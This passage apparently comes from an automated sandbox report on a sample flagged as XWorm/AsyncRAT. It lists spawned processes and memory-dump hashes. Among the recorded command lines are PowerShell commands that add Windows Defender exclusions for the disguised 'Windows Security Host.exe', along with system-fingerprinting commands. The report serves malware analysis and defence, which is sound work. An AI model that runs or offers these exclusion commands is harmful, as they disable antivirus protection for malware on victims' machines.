                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe"
                                                                                                                                                      Imagebase:0x1ef94d50000
                                                                                                                                                      File size:819'200 bytes
                                                                                                                                                      MD5 hash:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 29%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"cmd" /c ipconfig /all
                                                                                                                                                      Imagebase:0x7ff67e710000
                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ipconfig /all
                                                                                                                                                      Imagebase:0x7ff6bd9a0000
                                                                                                                                                      File size:35'840 bytes
                                                                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:14:14:02
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                      Imagebase:0x7ff61b130000
                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:14:14:02
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:14:14:03
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:14:14:03
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
                                                                                                                                                      Imagebase:0x7ff6763b0000
                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:28
                                                                                                                                                      Start time:15:19:27
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:29
                                                                                                                                                      Start time:15:19:27
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:15:19:43
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:15:19:43
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:34
                                                                                                                                                      Start time:15:20:11
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0x8e0000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:35
                                                                                                                                                      Start time:15:20:20
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f650329f753d643096586243d815d1386cf7e3c8435da7ba1a1ee3f27684c59f
                                                                                                                                                        • Instruction ID: 7983eaa5ae6c17416323ceb1b70b4b5bf301168f90fc87dbaeb4b2e584706dc0
                                                                                                                                                        • Opcode Fuzzy Hash: f650329f753d643096586243d815d1386cf7e3c8435da7ba1a1ee3f27684c59f
                                                                                                                                                        • Instruction Fuzzy Hash: FBD1C770A1891A8FEB98EB28C458ABD7BD5FF99311B008679E41ED31D2DE34EC45C780
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 88
                                                                                                                                                        • API String ID: 0-364594109
                                                                                                                                                        • Opcode ID: 55900a2fa7e87da95f64bf3d17b8e45544dec54f30323521037c3058166d747f
                                                                                                                                                        • Instruction ID: 9bf52c3d108aee2744d396380eb5f2f3957949a14ae6a3d2fb17c36c7eb50a23
                                                                                                                                                        • Opcode Fuzzy Hash: 55900a2fa7e87da95f64bf3d17b8e45544dec54f30323521037c3058166d747f
                                                                                                                                                        • Instruction Fuzzy Hash: A0811952E5DA468FF798DB7C48597B96FD5FF9A210F08817AE04DC3293ED28980583C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 88
                                                                                                                                                        • API String ID: 0-364594109
                                                                                                                                                        • Opcode ID: 6fb72e8204cd78db0d950c8e23611c1b9d0439eded1b3aa4fe5006a5afa1c032
                                                                                                                                                        • Instruction ID: f8a6b7b3323ef20b19b6290785eaaff4612f932faa9524de8da811bcf0ef5eb9
                                                                                                                                                        • Opcode Fuzzy Hash: 6fb72e8204cd78db0d950c8e23611c1b9d0439eded1b3aa4fe5006a5afa1c032
                                                                                                                                                        • Instruction Fuzzy Hash: D8711962F1DA0A8BF7D8EB6C88597B96BD5EF99310F04817AE00DC3293ED24980543C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 3CL_^
                                                                                                                                                        • API String ID: 0-3907758863
                                                                                                                                                        • Opcode ID: f0343eedd99074f5d55bc573d4b68d3609cbad6f5420910aa0d135ab00ba3814
                                                                                                                                                        • Instruction ID: 9522357f10abbbc30702811b4847bd7a0ed348bd928ffb44b5770f654db7cabd
                                                                                                                                                        • Opcode Fuzzy Hash: f0343eedd99074f5d55bc573d4b68d3609cbad6f5420910aa0d135ab00ba3814
                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A196A4E7D29FE356577828250E57FA0DF8724071CC0FBE0CC8A5BBB918D80983C5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac5b0000_8Hd0ZExgJz.jbxd
Similarity
• API ID:
• String ID: 3CL_^
• API String ID: 0-3907758863
• Opcode ID: 621207e3f6bc4056ce55823f62639f523638e482d28b70dd1cf386132700ab4a
• Instruction ID: 6eee58300bd2896f4cc17ad9fd19cf6c622802a0a0dc75c09a8ac6ac90c5de5c
• Opcode Fuzzy Hash: 621207e3f6bc4056ce55823f62639f523638e482d28b70dd1cf386132700ab4a
• Instruction Fuzzy Hash: 3FF0BEA0D4E24386FB583374801A3B96E849F83314F48C5BCF00E4A2C3EE1EE98942C1
Memory Dump Source
• Source File: 00000000.00000002.1260152635.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                        • Opcode Fuzzy Hash: b2c90459b6ecc8cc6e70afce64a14f8a05ee115dbe45c715c087814d649fba7f
                                                                                                                                                        • Instruction Fuzzy Hash: 0C51757091978A8FEB88CF18C860A753BA1FF5A304F1445ADE45DC72D2CB35E916D781
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7da074ba844929931a67d2d047b7f44b2a757c45af3bcdb5e4250c7433a4b66b
                                                                                                                                                        • Instruction ID: 84ae00d66f70d26548e17a44bd28ad3869957455049c65cba5c2d11e13605ee1
                                                                                                                                                        • Opcode Fuzzy Hash: 7da074ba844929931a67d2d047b7f44b2a757c45af3bcdb5e4250c7433a4b66b
                                                                                                                                                        • Instruction Fuzzy Hash: 5941B171A0854B8FEB88DF28C8556BA77E1FFA9310F048139E80DD3295DF34D9069B80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3cd6a5638ebe927e869634c9b50c1bd0694956cba98293b65cfcb06373ea7a8b
                                                                                                                                                        • Instruction ID: a09dc17cd4827dd02009d03d2d6f6cc96d728d2c076d3dbd684c04011a923031
                                                                                                                                                        • Opcode Fuzzy Hash: 3cd6a5638ebe927e869634c9b50c1bd0694956cba98293b65cfcb06373ea7a8b
                                                                                                                                                        • Instruction Fuzzy Hash: AF21062055E6C78FE356973888158797FE4EF63221B0541FBE08DC71A2CE18D806C782
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9a424c689f20a9f8c19a1a9865bfd7b2b2df7d880b72fb0aea7ca86163d6f2fc
                                                                                                                                                        • Instruction ID: 01ed7839d21d967f3f29ee67786d7357b7d789b2f7d322ff8f0cc131b34889b1
                                                                                                                                                        • Opcode Fuzzy Hash: 9a424c689f20a9f8c19a1a9865bfd7b2b2df7d880b72fb0aea7ca86163d6f2fc
                                                                                                                                                        • Instruction Fuzzy Hash: A221F521B5CA4A8FF754A77C941A676B7C5EB8A210F0445FAF00DC7293DD18DD4683D1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4ee1225c50ca941342a2242e5bd1c0347054795560a34b63d8f6aec89f0d1587
                                                                                                                                                        • Instruction ID: 273c1ca06b5540f8234e3b115c33c5c72e0e6750f4da496d415450d080f3b84b
                                                                                                                                                        • Opcode Fuzzy Hash: 4ee1225c50ca941342a2242e5bd1c0347054795560a34b63d8f6aec89f0d1587
                                                                                                                                                        • Instruction Fuzzy Hash: 3231742094958A8FF745EB68C455BB9BBE1EF5A300F4444B9E04DC72E3CE28A945D781
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 094b6468792f15aac351ab12d3b40883cd9316e42981e2a1ef26acfc18f4181e
                                                                                                                                                        • Instruction ID: fa33cfb3fddf4b17b144f4bea9f40e8bdb62c8c9143dede82bc29325cf71cceb
                                                                                                                                                        • Opcode Fuzzy Hash: 094b6468792f15aac351ab12d3b40883cd9316e42981e2a1ef26acfc18f4181e
                                                                                                                                                        • Instruction Fuzzy Hash: F5110321B18E0E8FF654E72C940AA7AB7C6EB89210F0445BAF00DC3296DD24ED4543D1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9ec08f70ca2dfc410d6223b4114b5707a6bbf62e5d2e1465d914de1c73941e81
                                                                                                                                                        • Instruction ID: 24a1cae810e92bda19b99eaff4a41e342ca83e0e87789b16f24c7a7a2cf93952
                                                                                                                                                        • Opcode Fuzzy Hash: 9ec08f70ca2dfc410d6223b4114b5707a6bbf62e5d2e1465d914de1c73941e81
                                                                                                                                                        • Instruction Fuzzy Hash: 0B21D432D8E95BCAF7A0A33448212FA36D8EF46310F408175E81CD7482EF1CAA1D27C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fcf20e6a39041b7139a5f3fb2c7ca1278f0376e46f2d84baed1d4873f8eb6cb9
                                                                                                                                                        • Instruction ID: b272894ba17eb75715d5c5a9298a1a0c27ab1e71d1b80a3542e331249e9039c8
                                                                                                                                                        • Opcode Fuzzy Hash: fcf20e6a39041b7139a5f3fb2c7ca1278f0376e46f2d84baed1d4873f8eb6cb9
                                                                                                                                                        • Instruction Fuzzy Hash: 9411065144E7C61FE31AA3784C2A5B97FD4DF57220F0946FEE489C75D3EC58A80A8392
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: da783a81731afab3c7a7db777c2e6d8f4d0014241749d2cd38f9a5c853a6e68c
                                                                                                                                                        • Instruction ID: b82d5ce9d9837ca6ba98e38076c66c87d40f7d3989672f323dd1eaf56eac5b37
                                                                                                                                                        • Opcode Fuzzy Hash: da783a81731afab3c7a7db777c2e6d8f4d0014241749d2cd38f9a5c853a6e68c
                                                                                                                                                        • Instruction Fuzzy Hash: 3821D25194E6CA0FE352977C48661A93FD0CF47120F0A49EFD0C9CB5E3E84C984B9342
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b64ac37906d8a422c14c1b5400f74027d1170c6c2dce972310b9bc7e824423bf
                                                                                                                                                        • Instruction ID: e3e57a01903911b6c22029242f7795ef9c0568abc5662ddeb9d1eab3cff38677
                                                                                                                                                        • Opcode Fuzzy Hash: b64ac37906d8a422c14c1b5400f74027d1170c6c2dce972310b9bc7e824423bf
                                                                                                                                                        • Instruction Fuzzy Hash: A611AF05A4F6838FF7905BB828162B52FD4DF6B650F0880F5E48DC7183DA1CA91E53D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 585ea2e980004dd3df2dde462ce0f323f0f540b43e6f39f5fcbcf861ec2d9000
                                                                                                                                                        • Instruction ID: 5390bb663132ce5266c5344d6708812b3c25caedbaadf74849c28b35ffbb853b
                                                                                                                                                        • Opcode Fuzzy Hash: 585ea2e980004dd3df2dde462ce0f323f0f540b43e6f39f5fcbcf861ec2d9000
                                                                                                                                                        • Instruction Fuzzy Hash: 2311E305A4E6478FFB906BBC34162F42BC4EF6A640F0480B5E88DC3183EE1CA91E53D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
